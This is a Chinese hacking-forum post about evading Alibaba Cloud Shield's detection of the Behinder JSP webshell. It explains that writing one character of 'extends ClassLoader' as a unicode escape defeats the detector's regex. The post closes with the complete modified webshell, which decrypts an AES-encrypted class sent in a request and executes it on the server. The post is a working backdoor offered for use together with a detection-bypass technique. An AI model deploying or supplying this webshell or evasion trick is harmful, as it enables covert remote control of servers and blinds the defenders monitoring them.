搜索
    Hi~登录注册
    查看: 548|回复: 0
    收起左侧

    【冰蝎jsp版webshell】一个字符绕过阿里云盾检测

    [复制链接]

    40

    主题

    0

    精华

    117 小时

    在线时间

    密圈

    积分
    34
    发表于 2019-8-31 09:06:40 | 显示全部楼层 |阅读模式
    阿里云盾默认不会拦截
    冰蝎的默认jsp webshell 脚本,但落地时会被检测到;

    并且会在控制台报警发短信/邮件告知管理员发现后门(Webshell 文件)。

    HK_Security_1567184611.png

    稍微研究了下,定位到正则表达式匹配的是

    [AppleScript] 纯文本查看 复制代码
    extends ClassLoader

    所以只需要更改原来的一个字符s,将

    [AppleScript] 纯文本查看 复制代码
    extends ClassLoader

    替换成

    [AppleScript] 纯文本查看 复制代码
    extend\u0073 ClassLoader

    就可以绕过阿里云盾的报警了。

    实测,绕过落地后的检测,后续的一些简单操作也没触发告警。

    HK_Security_1567213537.png

    附:

    更改后的完整绕过脚本

    [AppleScript] 纯文本查看 复制代码
    <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extend\u0073 ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>







    上一篇:小技巧免杀绕过360
    下一篇:自用php大马:世界上最好用的无后门大马webshell
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表